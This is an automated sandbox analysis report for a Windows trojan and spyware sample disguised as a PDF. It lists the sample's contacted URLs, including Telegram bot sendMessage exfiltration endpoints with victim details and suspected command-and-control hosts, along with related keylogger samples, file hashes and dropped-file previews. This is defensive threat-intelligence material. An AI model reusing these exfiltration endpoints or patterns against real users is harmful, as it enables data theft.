                                  https://chrome.google.com/webstore?hl=enlBeqRegSvcs.exe, 00000002.00000002.4548549275.0000000002ED2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.telegram.orgRegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botPK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://checkip.dyndns.orgRegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://chrome.google.com/webstore?hl=enRegSvcs.exe, 00000002.00000002.4548549275.0000000002ED7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://varders.kozow.com:8081PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          http://aborters.duckdns.org:8081PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20aRegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://anotherarmy.dns.army:8081PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://checkip.dyndns.org/qPK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://reallyfreegeoip.org/xml/8.46.123.189$RegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000002.00000002.4548549275.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000002.00000002.4548549275.0000000002D41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000002.00000002.4554296392.0000000003D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedPK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://reallyfreegeoip.org/xml/PK241200518-EMAIL RELEASE-pdf.exe, 00000000.00000002.2102160554.0000000003640000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4547493912.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4548549275.0000000002D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.office.com/lBeqRegSvcs.exe, 00000002.00000002.4548549275.0000000002F03000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    132.226.8.169
                                                                                    		checkip.dyndns.comUnited States
                                                                                    		16989UTMEMUSfalse
                                                                                    149.154.167.220
                                                                                    		api.telegram.orgUnited Kingdom
                                                                                    		62041TELEGRAMRUfalse
                                                                                    172.67.177.134
                                                                                    		reallyfreegeoip.orgUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1577088
                                                                                    Start date and time:2024-12-18 00:29:09 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 3s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:5
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:PK241200518-EMAIL RELEASE-pdf.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    • Number of executed functions: 54
                                                                                    • Number of non-executed functions: 269
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                    • VT rate limit hit for: PK241200518-EMAIL RELEASE-pdf.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    18:30:26API Interceptor9875255x Sleep call for process: RegSvcs.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    132.226.8.169PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    malware.ps1Get hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    QUOTES REQUEST FOR PRICES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • checkip.dyndns.org/
                                                                                    149.154.167.220stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                      stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                          zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                            ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        api.telegram.orgstealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        checkip.dyndns.comugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 193.122.130.0
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 158.101.44.242
                                                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 193.122.6.168
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 158.101.44.242
                                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 193.122.130.0
                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 193.122.130.0
                                                                                                        reallyfreegeoip.orgugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 104.21.67.152
                                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 104.21.67.152
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 188.114.97.3
                                                                                                        Justificante pago-09453256434687.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 104.21.67.152

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        TELEGRAMRUstealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        stealer.jarGet hashmaliciousCan StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Setup.msiGet hashmaliciousVidarBrowse
                                                                                                        • 149.154.167.99
                                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        dP5z8RpEyQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 149.154.167.220
                                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        UTMEMUSugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        CITAS_pif.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 132.226.8.169
                                                                                                        conferma..exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 132.226.8.169
                                                                                                        Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.247.73
                                                                                                        file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 132.226.8.169
                                                                                                        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 132.226.8.169
                                                                                                        41570002689_20220814_05352297_HesapOzeti.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                        • 132.226.8.169
                                                                                                        CLOUDFLARENETUSHarrisassoc_Updated_Workplace_Policies_and_Compliance_Guidelines.pdf.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 172.67.74.152
                                                                                                        hades.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                        • 104.21.23.76
                                                                                                        https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        http://inspirafinancial.comGet hashmaliciousUnknownBrowse
                                                                                                        • 104.16.123.96
                                                                                                        https://technicalwriterhq.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=temadewelgFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%6D%6F%74%6C%65%79%2D%61%6D%65%6E%61%62%6C%65%2D%73%74%69%6E%67%2E%67%6C%69%74%63%68%2E%6D%65#Y2hhbmd5ZW9sLmNob2lAaHl1bmRhaWVsZXZhdG9yLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 104.23.168.53
                                                                                                        loader.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.151.119
                                                                                                        support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        • 104.21.64.1

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        Ls4O6Pmixd.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        pre-stowage.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                        • 172.67.177.134
                                                                                                        PURCHASE ORDER TRC-0909718-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        • 172.67.177.134
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0esupport.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                        • 149.154.167.220
                                                                                                        https://ce4.ajax.a8b.co/get?redir=1&id=d4vCW7zizPl1mo0GYx0ELgo+CCIybH9/c4qC7CeWEuI=&uri=//the-western-fire-chiefs-association.jimdosite.comGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        zyEDYRU0jw.exeGet hashmaliciousArcaneBrowse
                                                                                                        • 149.154.167.220
                                                                                                        hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                        • 149.154.167.220
                                                                                                        http://escrowmedifllc.hostconstructionapp.comGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220
                                                                                                        BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                        • 149.154.167.220
                                                                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        • 149.154.167.220
                                                                                                        174 Power Global_Enrollment_.docx.docGet hashmaliciousUnknownBrowse
                                                                                                        • 149.154.167.220

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Temp\aut1EA1.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):110788
                                                                                                        Entropy (8bit):7.786105521081938
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:QEQzyChJZfs3KyNx7qAkhKt67Z3P2pCBlT8JnvAgXdviRjqWHHuyLvDIW5XsLcnT:QEKhsNkM67Z/X/GvTXdvnGHnPFp++Jx
                                                                                                        MD5:5D7FC14E8538B4C0D0CD5E8F4D1F1BAC
                                                                                                        SHA1:FD1CEA2751E2D50BC839CCDA7BC284F664A61D75
                                                                                                        SHA-256:2BAAF0AE986B07216B708C81179AE98B47DB4A3DE459F2E5D178E370B44393EA
                                                                                                        SHA-512:849FBE71480D68B8E65B3C3A436C5F9274F595A1CAF370EFAC5CCAA6C1AF985472E9B2999FF227EFD63B50B9EAAF3D3CCAE632EF4985AFA7833F4ACB26B2759C
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:EA06..0...;.Y.FcT.M.4.o&.H.P..Y...p..*Sj."d.!........'...s.fb8..?..H+s.l.>.I.5...gX.I..)|.3#.N.....-y..+..L./\.W.....A.[.BeT...2...vj3:..oa.T...D....:kL.E....$.@..&.`..iX.M.$34........Pb.6.sfT*..sA..d4..........-..A.Mi.Y0..."..f. .P....@V..;8..#@...P..I0..f..X....Y5...=r.V%...oZ..$.`.... T...l.....f1H... ..k.....1. &...b....D..P.......3......5].}...U&`...mX.t...........4....=..y..........A.`....`..@....@...A...f.. P......u..*...x..2....9....i...s.V(S+F.m...k....V....*G6.9..d.....5. &6.,..L&.Y.....Q.Y...T..$....'.....K.A.M.5{.B.J.^).Y.F7r.My....S.X).}.`...Y.....5.. $....cF.M.. .... ...eJes.F,.:H....G"s*..L.....FyT.L.v.d..@..m.|..@.S/..."{B..bw:}..........@.Tcwjt..@..,Q..z.9.....>...X.V.|.YQ..#s`..@...0..".j..I.Nor...\..G+.*....Th5z..cL.G..$..Y9...d.eN..&.......g...X..6..@.{@..D..Tk..eB......1..+.."eD.........T.........i.......V.v...#..&.....7..jtx..cT.G#.........6...$.T..T..<..&u.m....R&...BsQ..t....Z.q@h.'T.@.I.=p..1d...R....j..t@(..b.`h....

                                                                                                        C:\Users\user\AppData\Local\Temp\endochylous

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):274432
                                                                                                        Entropy (8bit):6.814857726622359
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:DDjeYIPoFRNFLz4MAOoeSWBTUDYuN/LVO:qPoFRNFLz4MAOoeSWBTUUuNzVO
                                                                                                        MD5:08328193BB484CEAA531D822B0075455
                                                                                                        SHA1:C8E91AA085D3CF1613D32DF6B6CB8044142EED69
                                                                                                        SHA-256:A4465FDE2784CB11F3B55E2E9B2086A9E493DA509E88FB568D8F94825D0278E9
                                                                                                        SHA-512:479D3A4E5D17053D21CD201F9E815184EF792B327455C40AC9ADD82553ABE0F5A968DCC82050B735C90BD33CD670FB518479FF5754C1733EFC871A7B58A790DA
                                                                                                        Malicious:false
                                                                                                        Reputation:low
                                                                                                        Preview:...E:Q1T461L..XH.BME9Q1Tp61LR6XH2BME9Q1T061LR6XH2BME9Q1T061L.6XH<].K9.8...0.... [1m5K>V&Q[./3X6'Fb/ .#D:.__l.y.h_-) .\<^.61LR6XHb.MEuP2T.*R6XH2BME.Q3U;7aLR,\H2VME9Q1T~.5LR.XH2.IE9QqT0.1LR4XH6BME9Q1T461LR6XH2.IE9S1T061LP6..2B]E9A1T06!LR&XH2BME)Q1T061LR6XH.uIEjQ1T0v5LE&XH2BME9Q1T061LR6XH2"IE5Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T0.1LZ6XH2BME9Q1T8.1L.6XH2BME9Q1T.BT4&6XHfZIE9q1T0,5LR4XH2BME9Q1T061Lr6X(.0>7ZQ1T'&1LRv\H2PME9M5T061LR6XH2BMEyQ1..DT =UXH>BME915T041LR.\H2BME9Q1T061L.6X.2BME9Q1T061LR6XH.zIE9Q1Tx61LP6]H..OEY.0T361L.6XN..OE.Q1T061LR6XH2BME9Q1T061LR6XH2BME9Q1T061LR6XH.?.J...=C..LR6XH2COF=W9\061LR6XHLBME.Q1Tp61Le6XH.BMETQ1T.61L,6XHLBME]Q1TB61L36XHuBMEVQ1T^61L,6XH,@ee9Q;~.63ds6XB2h.6.Q1^.71LVE{H2H.G9Q5'.61F.5XH61hE9[.P065?t6XB.GME={kT3.'JR6C'.BMO9R.A661Wx.XJ.xME3Q.r05.YT6XS.`MG.X1T4.g?O6XN..ME3%8T04.FR6\b,@e.9Q;~.H:LR2sH.`3I9Q5.0..2_6XL.Bg[;.<T02.n,8XH6iMo./>T02.Lx(Z.=BMA.sOD065gR.z6#BMA.Q.vN$1LV.Xb.<^E9U.T..OXR6\c2ho;,Q1P.6.n, XH6iMo./&T02.Lx.&P2BIn9{/V..1LV.^bPB?.,QAW

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):6.981917613125755
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
